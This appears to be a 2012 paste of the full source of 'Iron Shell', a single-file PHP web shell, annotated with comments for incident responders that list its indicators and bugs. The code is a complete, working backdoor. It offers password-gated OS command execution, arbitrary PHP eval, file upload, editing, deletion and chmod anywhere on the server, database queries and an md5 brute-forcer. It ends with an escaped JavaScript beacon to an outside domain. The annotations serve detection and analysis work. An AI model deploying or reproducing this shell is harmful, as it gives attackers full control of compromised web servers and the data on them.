Fakhru

Iron Shell

Feb 18th, 2012
<?php
// Analyst note: this file is a single-file PHP web shell ("Iron Shell", signed by
// the RootShell Security Group). The comments below describe what each part does
// so an incident responder can scope it, and which artefacts it leaves behind.
// Stable indicators visible on this page: the cookie name "wieeeee", the page
// title suffix " ~ Shell I", links to rootshell-team.info and ironwarez.info,
// and the query parameters p=cmd / p=eval.
error_reporting(0); // Silences every PHP error and warning, so failed operations leave nothing in the error log (the original comment claimed the opposite). An unconditional error_reporting(0) at the top of an unknown file is itself a triage signal.

$password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars. Analyst note: hard-coded shared secret; a 32-char value is treated as an md5 digest (see below), anything else is compared as plaintext.

$me = basename(__FILE__); // The script's own name: every form and link posts back to it, so renaming the file does not break it.
$cookiename = "wieeeee"; // "Session" is this cookie holding the password (or its md5) verbatim, sent in the clear on every request — it shows up in proxy/WAF logs as-is.


if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{

if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
{
$_POST['pass'] = md5($_POST['pass']);
}

if($_POST['pass'] == $password) // Loose == on two strings, not an exact match (numeric-looking strings compare numerically in PHP).
{
setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in — the cookie value *is* the credential, valid for one hour.
}
reload(); // Sends a Location header but does not exit; the request falls through to the gate below, which does not yet see the cookie in $_COOKIE and prints the login form before die().
}



// Authentication gate for every request. `or` binds looser than `&&`, so this
// reads as (password set AND no cookie) OR (cookie != password): any request
// whose cookie does not loosely equal $password gets the login form and stops.
if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
login();
die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
  35.  
// Logout: expires the cookie and redirects. Note the page switch further down
// reads $_REQUEST['p'], not $_GET, so pages can be selected via GET or POST.
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
// Working-directory switch. Everything below uses '.' and realpath('.'), so
// every listing, upload, edit and delete happens inside whatever path ?dir=
// named. There is no validation — any directory the web server user can enter.
if(isset($_GET['dir']))
{
chdir($_GET['dir']);
}


// Menu entries (page id => label). The switch below also handles pages that are
// not listed here — edit, delete, rename, createdir — reached from links and
// forms on the directory listing.
$pages = array(
'cmd' => 'Execute Command',
'eval' => 'Evaluate PHP',
'mysql' => 'MySQL Query',
'chmod' => 'Chmod File',
'phpinfo' => 'PHPinfo',
'md5' => 'md5 cracker',
'headers' => 'Show headers',
'logout' => 'Log out'
);
  57.  
//The header, like it?
// Markup is assembled as one string and printed below. Stable literals useful
// for content matching: the <title> suffix " ~ Shell I" (prefixed with the
// HTTP_HOST the shell was reached on) and the "RootShell" link in the top bar.
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
<head>
<style>
td {
font-size: 12px;
font-family: verdana;
color: #33FF00;
background: #000000;
}

#d {
background: #003000;
}
#f {
background: #003300;
}
#s {
background: #006300;
}
#d:hover
{
background: #003300;
}
#f:hover
{
background: #003000;
}
pre {
font-size: 10px;
font-family: verdana;
color: #33FF00;
}
a:hover {
text-decoration: none;
}


input,textarea,select {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #33FF00;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #33FF00;
color: #33FF00;
border-top-color: #33FF00;
font-family: verdana;
border-right-width: 1px;
border-right-color: #33FF00;
}

hr {
color: #33FF00;
background-color: #33FF00;
height: 5px;
}

</style>

</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] ';

// One nav link per menu entry; each carries the current directory
// (realpath('.')) so the ?dir= switch above is re-applied on every page.
foreach($pages as $page => $page_name)
{
$header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';

}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>'; // show_dirs() (defined at the bottom) calls ereg(), which was removed in PHP 7.0 — on such hosts every authenticated request fatals here, silently because of error_reporting(0).
print $header;

$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>'; // Printed at the very end of the file; the "Iron & RootShell Security Group" attribution is another stable grep target.
  135.  
  136.  
//
//Page handling
//
// Analyst note — scope of compromise. Once the cookie gate is passed, the pages
// below give the web server's user: OS command execution (cmd), arbitrary PHP
// (eval), read/write/delete/rename/chmod of any reachable file (edit, delete,
// rename, chmod), file upload and mkdir (default page, createdir), database
// statements with supplied credentials (mysql), and phpinfo / request-header
// disclosure. The page selector and the shell command are read from $_REQUEST,
// so both can travel in the query string and then appear in the access log
// (p=cmd&command=, p=eval); most other inputs are POST-only and will not.
if(isset($_REQUEST['p']))
{
switch ($_REQUEST['p']) {

case 'cmd': //Run command: $_REQUEST['command'] is handed to whichever shell function get_execution_method() picked.

print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
if(isset($_REQUEST['command']))
{
print "<pre>"; // Never closed; the command output is streamed raw after it.
execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
}
break;


case 'edit': //Edit a file: an optional POST writes the textarea body to $_GET['file'] (created or truncated), then the file is shown in the form.
if(isset($_POST['editform']))
{
$f = $_GET['file'];
$fh = fopen($f, 'w') or print "Error while opening file!"; // The assignment happens before `or`, so $fh is false on failure and fclose() below only raises a (suppressed) warning.
fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
fclose($fh);
}
print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">"; // $_GET['file'] is echoed unescaped into the page and the form action.

if(file_exists($_GET['file']))
{
$rd = file($_GET['file']);
foreach($rd as $l)
{
print htmlspecialchars($l); // Contents are escaped, so this page doubles as a viewer for any readable file.
}
}

print "</textarea><input type=submit value=\"Save\"></form>";

break;

case 'delete': //Delete a file: unlink($_GET['file']) once the confirmation form has POSTed yes=yes.

if(isset($_POST['yes']))
{
if(unlink($_GET['file']))
{
print "File deleted successfully.";
}
else
{
print "Couldn't delete file.";
}
}


if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
{
print "Are you sure you want to delete ".$_GET['file']."?<br>
<form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
<input type=hidden name=yes value=yes>
<input type=submit value=\"Delete\">
";
}


break;


case 'eval': //Evaluate PHP code: eval() on the raw POST body. eval is a language construct, so the disable_functions directive does not cover it.

print "<form action=\"".$me."?p=eval\" method=POST>
<textarea cols=60 rows=10 name=\"eval\">";
if(isset($_POST['eval']))
{
print htmlspecialchars($_POST['eval']);
}
else
{
print "print \"Yo Momma\";"; // Default textarea content — another literal worth matching on.
}
print "</textarea><br>
<input type=submit value=\"Eval\">
</form>";

if(isset($_POST['eval']))
{
print "<h1>Output:</h1>";
print "<br>";
eval($_POST['eval']); // Runs in this script's scope with the web server user's privileges.
}

break;

case 'chmod': //Chmod file: only 777/644/755 are applied (loose == against the POSTed value); any other value is ignored but still reported as changed.


print "<h1>Under construction!</h1>";
if(isset($_POST['chmod']))
{
switch ($_POST['chvalue']){
case 777:
chmod($_POST['chmod'],0777);
break;
case 644:
chmod($_POST['chmod'],0644);
break;
case 755:
chmod($_POST['chmod'],0755);
break;
}
print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue']."."; // Printed regardless of whether chmod() succeeded or ran at all.
}
if(isset($_GET['file']))
{
$content = urldecode($_GET['file']); // Echoed unescaped into the form below.
}
else
{
$content = "file/path/please";
}

print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
<input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
<select name=\"chvalue\">
<option value=\"777\">777</option>
<option value=\"644\">644</option>
<option value=\"755\">755</option>
</select><input type=submit value=\"Change\">";

break;

case 'mysql': //MySQL Query: connects with the POSTed host/user/password and runs one statement; the result is never displayed (the form says so). Uses ext/mysql, removed in PHP 7.0, so this page fatals on current hosts.

if(isset($_POST['host']))
{
$link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error()); // die() here skips the footer entirely.
mysql_select_db($_POST['dbase']);
$sql = $_POST['query'];


$result = mysql_query($sql); // $result is computed and discarded.

}
else
{
print "
This only queries the database, doesn't return data!<br>
<form action=\"".$me."?p=mysql\" method=POST>
<b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
<b>Username:<br><input type=text name=username value=\"root\" size=10><br>
<b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
<b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>

<b>Query:<br></b<textarea name=query></textarea>
<input type=submit value=\"Query database\">
</form>
";

}

break;

case 'createdir': // mkdir($_GET['crdir']) — reached from the "Create directory" form on the default page.
if(mkdir($_GET['crdir']))
{
print 'Directory created successfully.';
}
else
{
print 'Couldn\'t create directory';
}
break;


case 'phpinfo': //PHP Info: full phpinfo() dump (configuration, paths, loaded modules, environment).
phpinfo();
break;


case 'rename': // rename($_POST['fileold'], $_POST['filenew']); both are arbitrary paths, so this also moves files between directories.

if(isset($_POST['fileold']))
{
if(rename($_POST['fileold'],$_POST['filenew']))
{
print "File renamed.";
}
else
{
print "Couldn't rename file.";
}

}
if(isset($_GET['file']))
{
$file = basename(htmlspecialchars($_GET['file'])); // The only page that escapes a file parameter before echoing it.
}
else
{
$file = "";
}

print "Renaming ".$file." in folder ".realpath('.').".<br>
<form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
<b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
<b>To:<br><input type=text name=filenew value=\"\" size=10><br>
<input type=submit value=\"Rename file\">
</form>";
break;

case 'md5': // md5 cracker: brute-forces a 32-char digest on the server's CPU; set_time_limit() is fed straight from the form.
if(isset($_POST['md5']))
{
if(!is_numeric($_POST['timelimit']))
{
$_POST['timelimit'] = 30;
}
set_time_limit($_POST['timelimit']);
if(strlen($_POST['md5']) == 32)
{

if($_POST['chars'] == "9999")
{
$i = 0;
while($_POST['md5'] != md5($i) && $i != 100000) // Stops at 100000 even though the form advertises 1 - 9999999.
{
$i++;
}
}
else
{
for($i = "a"; $i != "zzzzz"; $i++)
{
if(md5($i == $_POST['md5'])) // Hashes the boolean comparison rather than $i; the result is a non-empty string, so this breaks on the first iteration and the a-zzzzz range is never searched.
{
break;
}
}
}


if(md5($i) == $_POST['md5']) // The only real check.
{
print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
}

}

}

print "Will bruteforce the md5
<form action=\"".$me."?p=md5\" method=POST>
<b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
<b>Characters:</b><br><select name=\"chars\">
<option value=\"az\">a - zzzzz</option>
<option value=\"9999\">1 - 9999999</option>
</select>
<b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
<input type=submit value=\"Bruteforce md5\">
</form><br>*: if set_time_limit is allowed by php.ini";
break;

case 'headers': // Echoes every request header back, escaped.
foreach(getallheaders() as $header => $value)
{
print htmlspecialchars($header . ":" . $value)."<br>";

}
break;
}

}
else //Default page that will be shown when the page isn't found or no page is selected.
{
// Default page: optional file upload into the current directory, then a listing
// of that directory with per-entry rename/delete/edit/chmod links, followed by
// the upload, change-directory, create-file and create-directory forms.

$files = array();
$directories = array();

if(isset($_FILES['uploadedfile']['name']))
{
$target_path = realpath('.').'/';
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); // Keeps the client's file name (basename only); no extension or content check.

if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
print "File:". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "File upload failed!";
}
}





print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
if ($handle = opendir('.')) // '.' is whatever ?dir= chdir()'d into.
{
while (false !== ($file = readdir($handle)))
{
if(is_dir($file))
{
$directories[] = $file;
}
else
{
$files[] = $file;
}
}
asort($directories);
asort($files);
// Directory rows: name links to ?dir=<path>; [R]/[D] link to the rename/delete pages; the permission cell links to chmod.
foreach($directories as $file)
{
print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
}

// File rows: same links, but the name opens the edit page and the size column is filled in.
foreach($files as $file)
{
print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
}
}
else
{
print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
}

// Bottom forms. "Create file" simply opens the edit page with a path, which creates the file on save.
print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
<input type=\"submit\" value=\"Upload File\" />
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
</table>";


}
  474.  
  475.  
// Password prompt: a bare form that POSTs "pass" back to this script. The
// <table> it opens is never closed; the only caller die()s right after, so no
// footer follows on this path.
function login()
{
print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
<form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
<input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
</form>";
}
// Redirects to this script with a Location header. There is no exit() after
// header(), so the caller keeps running: the login path is stopped by the
// gate's die(), the logout path carries on to the end of the file.
function reload()
{
header("Location: ".basename(__FILE__));
}
  487.  
// Chooses the shell-execution function for the cmd page. Each test overwrites
// $m, so the last one that function_exists() wins: system, then shell_exec,
// exec, passthru. Returns the string "Disabled" when none exists.
// Note the typo "shell_ exec" (with a space): execute_command() compares
// against "shell_exec", so a host that exposes only shell_exec() falls through
// every branch there and runs nothing. Mitigation note: disable_functions can
// remove all four of these, but the eval page does not depend on any of them.
function get_execution_method()
{
if(function_exists('passthru')){ $m = "passthru"; }
if(function_exists('exec')){ $m = "exec"; }
if(function_exists('shell_exec')){ $m = "shell_ exec"; } // Typo — never matches in execute_command().
if(function_exists('system')){ $m = "system"; }
if(!isset($m)) //No method found :-|
{
$m = "Disabled";
}
return($m);
}
  500.  
// Runs $command through the function named by $method (one of the labels
// produced by get_execution_method()). passthru() and system() stream the raw
// output straight to the client; the exec() branch prints each captured line
// unescaped with a <br>. "Disabled" and the misspelt shell_exec label match no
// branch and produce no output. Nothing is escaped, filtered or logged.
function execute_command($method,$command)
{
if($method == "passthru")
{
passthru($command);
}

elseif($method == "exec")
{
exec($command,$result); // $result receives one array element per output line.
foreach($result as $output)
{
print $output."<br>";
}
}

elseif($method == "shell_exec")
{
print shell_exec($command);
}

elseif($method == "system")
{
system($command);
}

}
  528.  
// Returns the last four octal digits of $file's mode (fileperms() formatted
// with %o, e.g. "100644" -> "0644"), or "????" when the file does not exist.
// Used by the edit page and by both rows of the directory listing.
function perm($file)
{
if(file_exists($file))
{
return substr(sprintf('%o', fileperms($file)), -4);
}
else
{
return "????";
}
}
  540.  
// Colour for a listing entry, judged from the web server user's access:
// "green" = writable, "white" = readable but not writable, "red" = neither.
// The three tests are exhaustive, so every path returns a string.
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}



}
  550.  
// Builds the clickable breadcrumb for $where: one link per path component,
// each pointing at ?dir=<components so far>. Splits on backslash when the
// resolved path starts with a lower-case "c:" (so only that one drive letter,
// in that case, is recognised), otherwise on slash. The test uses ereg(), which
// was removed in PHP 7.0; since this function runs while the header is built
// for every authenticated request, on such hosts the whole shell stops with an
// effectively blank page.
function show_dirs($where)
{
if(ereg("^c:",realpath($where)))
{
$dirparts = explode('\\',realpath($where));
}
else
{
$dirparts = explode('/',realpath($where));
}



$i = 0;
$total = "";

foreach($dirparts as $part)
{
$p = 0;
$pre = "";
while($p != $i) // Rebuilds the prefix of all components before this one.
{
$pre .= $dirparts[$p]."/";
$p++;

}
$total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
$i++;
}

return "<h2>".$total."</h2><br>";

}
print $footer;

// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
exit(); // Ends the script here, so the HTML after the closing tag below is never sent to the browser.
// Analyst note: the <script> line after ?> is \uXXXX-escaped JavaScript. Decoded
// it writes <img src="hxxp://alturks[.]com/snf/s.php" width="1" height="1">,
// i.e. a 1x1 tracking pixel that would report each page view to a third party.
// Because exit() runs first it is inert in this copy, but the domain is a
// useful indicator when hunting for variants of this shell in web content or
// egress logs.
?>
<script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>